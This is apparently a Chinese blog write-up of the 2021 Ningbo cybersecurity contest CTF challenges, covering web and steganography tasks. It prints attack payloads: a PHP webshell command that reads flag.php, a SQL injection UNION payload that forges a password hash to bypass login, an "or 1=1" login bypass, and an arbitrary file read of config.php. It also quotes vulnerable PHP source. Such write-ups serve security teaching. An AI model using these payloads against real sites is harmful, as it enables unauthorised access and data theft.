2021宁波市第四届网络安全大赛

Posted 2021-05-25 huamanggg

简单的php

和nepctf那题litter_thick一样的
找到有一个flag.php

然后写个马进去，cat一下flag.php就可以了

?1=echo `cat flag.php`;

index

index.php~有源码

 <?php
include ("config.php");
$db = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($database, $db) or die("Could not select database");
mysql_query("set names utf8");
if ($conn->connect_error) {
    die("Connection failed: " . mysql_error($conn));
}

$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (! $query) {
    printf("Error: %s\\n", mysqli_error($conn));
    exit();
}
$row = mysql_fetch_array($query);
if (($row[pw]) && (! strcasecmp($pass, $row[pw]))) {
    echo "<p>Logged in! Key: " . $flag . " </p>";
} else {
    echo ("<p>Log in failure!</p>");
}

strcasecmp()函数，匹配到相等就返回0
满足这个式子就可以了

($row[pw]) && (! strcasecmp($pass, $row[pw]))

那么只要求$row(pw)和我们传进去password一样就可以了
payload：

user=1' union select '71f67e393280fa78ab9f6ce81b54bc72'#&pass=jxnu

getflag

直接访问/flag.php

helloworld

.index.php.swp找到备份文件

<?php 
    require_once('config.php');
    $file = $_GET['file'];
    $file_text = file_get_contents($file);
    print_r($file_text);
    if($file_text == $test666){
        print_r($flag);
    }
 ?>

那就直接读取config.php
sss607

伪协议再打一下就可以了

文件管理网站

guest可以登录，但是什么功能都没有

这个万能密码可以登录进去1' or 1=1 #，身份还是guest

看了一下目录扫描的结果，直接扫到1.htaccess。。。

直接访问，有一个

拿到flag

简单编码

jsfuck，运行一下是这个

美丽的小姐

CRC出问题，改宽高就好了

音符

文件尾写了password为ejfg

音符解码

简单乘法

jpg隐写，jphide

但是少了密码

听雨寻知音

010看了一下又一个png头
foremost分离出一个二维码

修复一下定位点

打开一个网址
滴滴答滴滴答滴滴滴答滴答滴滴答滴滴答答滴滴滴滴滴答答答滴答
莫斯电码
…-…-…-.-…-…–…—.-
但是不知道怎么分割

nike

是一个比赛的原题

代码美化一下
然后py2跑

改一下

跑出

得到flag